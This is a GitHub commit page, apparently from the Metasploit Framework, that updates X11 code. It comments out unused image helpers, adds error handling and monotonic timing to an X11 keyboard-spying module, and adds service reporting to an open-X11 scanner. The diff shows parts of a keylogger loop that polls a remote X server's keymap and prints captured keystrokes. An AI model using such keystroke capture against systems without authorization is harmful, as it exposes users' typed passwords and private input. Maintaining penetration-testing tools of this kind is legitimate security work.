Skip to content

Commit

Permalink
xspy updates
Browse files Browse the repository at this point in the history
  • Loading branch information
h00die committed Nov 21, 2024
1 parent 07cc3bb commit 4ff3897
Show file tree
Hide file tree
Showing 4 changed files with 434 additions and 49 deletions.
90 changes: 46 additions & 44 deletions lib/rex/proto/x11/window.rb
Original file line number Diff line number Diff line change
Expand Up @@ -191,23 +191,24 @@ class X11GetWindowResponse < BinData::Record
end
end

def create_overlay_map(screen_width, screen_height, windows)
# Initialize a 2D array to represent the screen
screen = Array.new(screen_height) { Array.new(screen_width, nil) }
windows.each_with_index do |window, i|
puts window.inspect
x, y, width, height = window
# Mark the visible region occupied by the window
(y...y + height).each do |row|
(x...x + width).each do |col|
screen[row][col] = i
end
end
end
screen.each do |row|
puts row.join('')
end
end
# for future use
# def create_overlay_map(screen_width, screen_height, windows)
# # Initialize a 2D array to represent the screen
# screen = Array.new(screen_height) { Array.new(screen_width, nil) }
# windows.each_with_index do |window, i|
# puts window.inspect
# x, y, width, height = window
# # Mark the visible region occupied by the window
# (y...y + height).each do |row|
# (x...x + width).each do |col|
# screen[row][col] = i
# end
# end
# end
# screen.each do |row|
# puts row.join('')
# end
# end

class X11Image
def initialize(width, height, image_data, color_data)
Expand All @@ -221,31 +222,32 @@ def self.from_replies(width, height, image_reply, color_reply)
new(width, height, image_reply.image_data, color_reply.colors)
end

def create_image
# Extract relevant data from @image_data and @color_data
width = @width
height = @height
pixel_data = @image_data
colors = @color_data

# Create an image object
image = ChunkyPNG::Image.new(width, height, ChunkyPNG::Color::TRANSPARENT)

# Populate image with pixel data and colors
pixel_data.each_with_index do |pixel, i|
color = colors[pixel]
# Set pixel color in the image
image[i % width, i / width] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
end
# (0...height).each do |y|
# (0...width).each do |x|
# # Extract color information from the pixel data and set the corresponding pixel in the PNG image
# color = colors[y+x]
# # pixel_color = extract_color_from_z_data(z_data)
# image[x, y] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
# end
# end

image
end
# for future use
# def create_image
# # Extract relevant data from @image_data and @color_data
# width = @width
# height = @height
# pixel_data = @image_data
# colors = @color_data

# # Create an image object
# image = ChunkyPNG::Image.new(width, height, ChunkyPNG::Color::TRANSPARENT)

# # Populate image with pixel data and colors
# pixel_data.each_with_index do |pixel, i|
# color = colors[pixel]
# # Set pixel color in the image
# image[i % width, i / width] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
# end
# # (0...height).each do |y|
# # (0...width).each do |x|
# # # Extract color information from the pixel data and set the corresponding pixel in the PNG image
# # color = colors[y+x]
# # # pixel_color = extract_color_from_z_data(z_data)
# # image[x, y] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
# # end
# # end

# image
# end
end
21 changes: 16 additions & 5 deletions modules/auxiliary/gather/x11_keyboard_spy.rb
Original file line number Diff line number Diff line change
Expand Up @@ -134,7 +134,11 @@ def run
@keylogger_print_buffer = ''

vprint_status('Establishing TCP Connection')
connect # tcp connection establish
begin
connect # tcp connection establish
rescue Rex::ConnectionError
fail_with(Msf::Module::Failure::Unreachable, 'Connection failed')
end
vprint_status('[1/9] Establishing X11 connection')
connection = x11_connect

Expand Down Expand Up @@ -208,7 +212,12 @@ def run
map_raw_data = sock.get_once(-1, 1)
# for debugging packet output, uncomment following line
# puts data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join
map_data = X11GetMapReply.read(map_raw_data)
begin
map_data = X11GetMapReply.read(map_raw_data)
rescue EOFError
debug_data = map_raw_data.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join
fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to process X11GetMapReply response (EOFError): #{debug_data}")
end

vprint_status('[8/9] Enabling notification on keyboard and map')
sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
Expand All @@ -232,13 +241,13 @@ def run

print_good('All setup, watching for keystrokes')
# loop mechanics stolen from exploit/multi/handler
stime = Time.now.to_f
print_timer = Time.now.to_f
stime = Process.clock_gettime(Process::CLOCK_MONOTONIC)
print_timer = Process.clock_gettime(Process::CLOCK_MONOTONIC)
timeout = datastore['LISTENER_TIMEOUT'].to_i
printerval = datastore['PRINTERVAL'].to_i
begin
loop do
break if timeout > 0 && (stime + timeout < Time.now.to_f)
break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC))

sock.put(X11QueryKeyMapRequest.new.to_binary_s)
bit_array_of_keystrokes = X11QueryKeyMapReply.read(sock.get_once(-1, 1)).data
Expand All @@ -258,6 +267,8 @@ def run
print_good("X11 Key presses observed: #{@keylogger_print_buffer}")
@keylogger_print_buffer = ''
end
rescue EOFError
print_error('Connection closed by remote host')
ensure
vprint_status('Closing X11 connection')
sock.put(Rex::Proto::X11::X11RequestHeader.new(opcode: 60).to_binary_s +
Expand Down
7 changes: 7 additions & 0 deletions modules/auxiliary/scanner/x11/open_x11.rb
Original file line number Diff line number Diff line change
Expand Up @@ -51,6 +51,13 @@ def run_host(ip)

if connection.header.success == 1
print_connection_info(connection, ip, rport)
report_service(
host: rhost,
proto: 'tcp',
port: rport,
info: "Open X Server (#{connection.body.vendor}) #{connection.body.screen_width_in_pixels}x#{connection.body.screen_height_in_pixels}",
name: 'X11'
)
else
vprint_error("#{ip} Access not successful: #{connection.body.reason}")
end
Expand Down
Loading

0 comments on commit 4ff3897

Please sign in to comment.